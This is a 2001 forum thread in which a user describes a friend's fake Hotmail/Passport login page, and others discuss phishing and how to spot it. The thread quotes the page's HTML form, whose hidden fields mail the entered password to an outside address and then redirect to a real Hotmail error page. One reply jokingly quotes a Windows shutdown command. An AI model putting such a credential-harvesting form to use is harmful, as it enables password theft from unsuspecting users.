eaglebtc Posted December 27, 2001 Share Posted December 27, 2001 OMFG...my friend scared the s*** out of me tonight. :o He created a web page which appeared to be a hotmail/passport login screen (please re-enter your password). He said he was testing "some spam site" of his, and as soon as I entered my password I got about 20 bazillion XXX popups. :o :mad: After closing all of those, I looked at the Source code for his page. The following four lines literally scared me s***less: (Please note: the URL in the "action" line below is a REDIRECTOR. Do not follow it. This is CODE, So it should not be linkable anyhow. If you follow it, you are a dirty b4st4rd :p) <pre> <FORM method=POST action="http://www.join4free.com/?wm=42960"> <input type=hidden name="to" value="x-rated007@excite.com"> <input type=hidden name="subject" value="Hotmail Password"> <input type=hidden name="redir" value="http://lc2.law5.hotmail.passport.com/cgi-bin/loginerr? disk=&login=&f=0&curmbox=ACTIVE&_lang=&error=4&sec=no &reauth=&id=2&ct=958278062&_lang=&domain="> </pre> :o :o :o Look at that! In those four short lines is the power to do the following: Forward to a specified site send an email with certain information Use the Microsoft Passport authentication system to retrieve and verify that information. My friend should be shot for doing this. I have chewed him out, and even after he convinced me that x-rated007@excite.com is his old email, and that he used it just as a joke, I still did NOT think it was funny. Do you think this is a HUGE weakness in the Passport system? Can it be abused like the AOL pages that prompt the AOLemmings to enter their passwords? Maybe I'm overreacting a bit, but it did scare me a lot. Perhaps it's nothing at all. What do you think? Let the forum know. Link to comment Share on other sites More sharing options...
X Posted December 27, 2001 Share Posted December 27, 2001 Wonder who voted for your on crack... :ponder: :lick: Ok Ok it was I heh... :D Link to comment Share on other sites More sharing options...
eaglebtc Posted December 27, 2001 Author Share Posted December 27, 2001 am i really on crack? cuz i thought it was real. i'm certainly no AOLer. but i think a lot of ppl could be fooled into doing it. Link to comment Share on other sites More sharing options...
Glowstick Posted December 27, 2001 Share Posted December 27, 2001 And then? You can do this with every login system. If the page just looks like Passport, tons of people will fall on it. How do you think hackers get passwords of lots of people? By faking login sites. If Passport wants you to authenticate, just make sure the address bar says www.passport.com. Coz to get Passport authenticated, the affiliated website redirects you to Passport which redirects you back to the website when being authenticated. Link to comment Share on other sites More sharing options...
Faction Posted December 27, 2001 Share Posted December 27, 2001 Lol.. i disabled all the messanger passport stuff, but yeah,4 lines of code = restart of computer. ghey : Link to comment Share on other sites More sharing options...
Quboid Posted December 27, 2001 Share Posted December 27, 2001 Um, you can do that will all log ins - make a fake on and save the details or move the visitor anywhere. It's not passport specific. It's dumb visitor specific. :) Link to comment Share on other sites More sharing options...
Glowstick Posted December 27, 2001 Share Posted December 27, 2001 what was it? rundll32 user32.dll,ExitWindowsEx ?? :D Link to comment Share on other sites More sharing options...
EmuZombie Veteran Posted December 27, 2001 Veteran Share Posted December 27, 2001 url removed, was a porn site Link to comment Share on other sites More sharing options...
Sub Posted December 27, 2001 Share Posted December 27, 2001 Ahh the old AOL Days. Creating Login sites made <> Link to comment Share on other sites More sharing options...
eaglebtc Posted December 28, 2001 Author Share Posted December 28, 2001 EmuZombie: That was not the URL he gave me. That was a redirect from his page. Here's the page in question: http://www.staticfree.net/newbieslair/ It looks convincing to me. The reason I got so upset about this is because Microsoft has tried to make a reasonably secure system. Sure, AOLers are just plain stupid to go to a site asking for their password, but when you have something like this that legitimate businesses are trying to use, couldn't any Joe Schmoe set up a phony passport authentication site? Furthermore, isn't it possible to make the Address Bar show anything you want? Theoretically, you could just show a long hairy URL that looks authentic to the untrained eye... Link to comment Share on other sites More sharing options...
X Posted December 28, 2001 Share Posted December 28, 2001 LOL.. Your on crack is winning!! :lick: Link to comment Share on other sites More sharing options...
freeza Posted December 28, 2001 Share Posted December 28, 2001 :ponder: Link to comment Share on other sites More sharing options...
bud1979 Posted December 28, 2001 Share Posted December 28, 2001 this has been out for years. I had a friend 2 years ago create the same thing. it takes your password and then gives them access also popping you to a porn site. Link to comment Share on other sites More sharing options...
configure Veteran Posted December 28, 2001 Veteran Share Posted December 28, 2001 Using MS's Passport system to verify the password, now THAT IMHO is brilliant :) Link to comment Share on other sites More sharing options...
eaglebtc Posted December 28, 2001 Author Share Posted December 28, 2001 when was this thread moved? who did it? Link to comment Share on other sites More sharing options...
hurting101 Posted December 28, 2001 Share Posted December 28, 2001 I saw something like this that looked just like the HOtmail signin page, and the URL looked the same (it was confusing enought already, how would anyone know?). Link to comment Share on other sites More sharing options...
configure Veteran Posted December 28, 2001 Veteran Share Posted December 28, 2001 From where it was moved? :ermm: Link to comment Share on other sites More sharing options...
eaglebtc Posted December 28, 2001 Author Share Posted December 28, 2001 from the general area. no biggie, just wondered who moved it. maybe emuzombie did. :paranoid: Link to comment Share on other sites More sharing options...
X Posted December 30, 2001 Share Posted December 30, 2001 This is HUGE. Call Microsoft ASAP. 1 3.45% This is pretty serious, but can be controlled. 5 17.24% This isn't a big deal. 3 10.34% You're on crack. 20 68.97% muhaha Link to comment Share on other sites More sharing options...
eaglebtc Posted December 31, 2001 Author Share Posted December 31, 2001 hhehe i know :p i prolly tilted the vote against me by including that option :) Link to comment Share on other sites More sharing options...
X Posted December 31, 2001 Share Posted December 31, 2001 Yup heh... :D Link to comment Share on other sites More sharing options...
kintamanate Posted December 31, 2001 Share Posted December 31, 2001 Bah, you are saying this like its something new? How do you think I found neowin in the first place? i was bored one day and looked how not to get scammed for this hotmail coding junk. it brought me to an old neowin news post #60 i think it was. right Neobond? (Back in late May, early June);) ahh those were the days...:disappoin Link to comment Share on other sites More sharing options...
Recommended Posts